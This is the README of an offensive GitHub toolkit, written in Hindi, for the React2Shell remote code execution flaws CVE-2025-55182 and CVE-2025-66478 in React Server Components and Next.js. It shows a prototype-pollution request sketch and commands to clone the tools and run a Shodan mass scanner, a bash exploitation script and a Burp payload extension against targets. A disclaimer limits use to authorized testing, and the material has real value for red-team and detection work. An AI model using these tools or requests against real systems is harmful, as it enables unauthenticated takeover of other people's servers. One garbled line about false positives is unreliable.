
🔥 React2Shell Toolkit - CVE-2025-55182 & CVE-2025-66478
🚨 React सर्वर कंपोनेंट्स और Next.js में क्रिटिकल RCE 🚨
CVE-2025-55182 का पता लगाने और शोषण के लिए पेशेवर रेड टीम टूलकिट
React2Shell एक क्रिटिकल बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी है जो React सर्वर कंपोनेंट्स (RSC) और Next.js एप्लिकेशन को प्रभावित करती है।
| CVE ID | घटक | CVSS स्कोर | प्रभाव |
|---|
// Attacker sends malicious Flight protocol payload
POST / HTTP/1.1
Next-Action: exploit
Content-Type: multipart/form-data
{"__proto__": "pollution", "then": "gadget_chain"}
↓
Unsafe Deserialization
↓
Prototype Pollution
↓
💥 Remote Code Execution 💥
असुरक्षित डिसीरियलाइज़ेशन प्रोटोटाइप प्रदूषण 💥 रिमोट कोड निष्पादन 💥
|
🔓 सफल RCE शोषण
React2Shell कमजोरी के माध्यम से कमांड निष्पादन |
⚠️ ये स्क्रीनशॉट नियंत्रित वातावरण में वास्तविक शोषण दर्शाते हैं
जिम्मेदारी से और केवल उचित प्राधिकरण के साथ उपयोग करें
इस रिपॉजिटरी में CVE-2025-55182 का पता लगाने और शोषण के लिए 4 पेशेवर-स्तरीय उपकरण हैं:
# Clone the repository
git clone https://github.com/cybertechajju/R2C-CVE-2025-55182-66478.git
cd R2C-CVE-2025-55182-66478
# Install Python dependencies
pip install -r requirements.txt
pip install -r exploits/requirements.txt
# Scan single target
nuclei -t nuclei-templates/cve-2025-55182.yaml -u https://target.com
# Scan multiple targets
nuclei -t nuclei-templates/cve-2025-55182.yaml -l targets.txt
# Interactive wizard mode
python exploits/shodan_scanner_advanced.py
# Or with API key directly
python exploits/shodan_scanner_advanced.py --api YOUR_SHODAN_API_KEY
# Interactive mode
bash exploits/scanner_advanced.sh -i
# Quick exploitation
bash exploits/scanner_advanced.sh -d https://target.com -p 2
burp-extension/React2Shell_Burp.py चुनेंcve-2025-55182/
├── 📂 nuclei-templates/ # Nuclei YAML templates
│ └── cve-2025-55182.yaml # Advanced detection template
├── 📂 exploits/ # Exploitation tools
│ ├── shodan_scanner_advanced.py # Shodan mass scanner
│ ├── scanner_advanced.sh # Bash exploitation framework
│ └── requirements.txt # Python dependencies
├── 📂 burp-extension/ # Burp Suite extension
│ ├── React2Shell_Burp.py # Main extension (30+ payloads)
│ ├── payloads.json # Payload library
│ └── detection_rules.json # Detection patterns
├── 📂 burp bechek/ # BCheck files for Burp Scanner
│ ├── CVE-2025-55182-React2Shell-Active.bcheck
│ └── CVE-2025-66478-NextJS-React2Shell-Active.bcheck
└── 📄 README.md # This file
41 * 271 = 11111 (शून्य गलत सकारात्मक)╔═══════════════════════════════════════════════════════════════╗
║ ⚠️ CRITICAL WARNING ⚠️ ║
╚═══════════════════════════════════════════════════════════════╝
यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण के लिए है।
⚖️ कानूनी उपयोग:
✅ लिखित प्राधिकरण के साथ पैनेट्रेशन परीक्षण
✅ परिभाषित दायरे में बग बाउंटी प्रोग्राम
✅ स्वामित्व वाले बुनियादी ढांचे पर सुरक्षा अनुसंधान
✅ नियंत्रित प्रयोगशालाओं में शैक्षिक उद्देश्य
❌ अवैध गतिविधियाँ:
⛔ अनधिकृत सिस्टम पहुँच
⛔ दुर्भावनापूर्ण शोषण
⛔ डेटा चोरी या विनाश
⛔ मैलवेयर तैनात करना
इस टूलकिट का उपयोग करके, आप इसे नैतिक और कानूनी रूप से उपयोग करने के लिए सहमत हैं।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच निम्नलिखित के तहत अवैध है:
• Computer Fraud and Abuse Act (CFAA) - USA
• Computer Misuse Act - UK
• दुनिया भर में समान कानून
🔒 आप अपने कार्यों के लिए पूरी तरह जिम्मेदार हैं।
सुरक्षा शोधकर्ता • रेड टीम विशेषज्ञ • बग बाउंटी हंटर
आदर्श वाक्य: सीखते रहो, हैक करते रहो 🚀
अगर इस टूलकिट ने आपकी मदद की, तो कृपया इस रिपॉजिटरी को ⭐ स्टार करें!
केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए
कोई वारंटी या देयता प्रदान नहीं की गई। अपने जोखिम पर उपयोग करें।
Issue खोलें या सोशल मीडिया पर संपर्क करें!
CyberTechAjju द्वारा ❤️ से बनाया गया
सीखते रहो। हैक करते रहो। नैतिक रहो। 🎯🔐
| CVE-2025-55182 | React सर्वर कंपोनेंट्स | 10.0 🔴 | पूर्ण सर्वर अधिग्रहण |
| CVE-2025-66478 | Next.js सर्वर क्रियाएँ | 10.0 🔴 | पूर्ण सिस्टम समझौता |
💥 कमजोरी की पुष्टि

फ्लाइट प्रोटोकॉल के माध्यम से सर्वर समझौता
🔍 Nuclei टेम्पलेटउन्नत स्कैनर ✅ 5 पेलोड |
🐍 Shodan स्कैनरलक्ष्य खोज ✅ स्वचालित खोज |
💻 Bash शोषणCLI फ्रेमवर्क ✅ 8 पूर्वनिर्धारित पेलोड |
🔧 Burp एक्सटेंशनमैनुअल परीक्षण ✅ 30+ पेलोड |
|
|
|
|
|
|
|
| |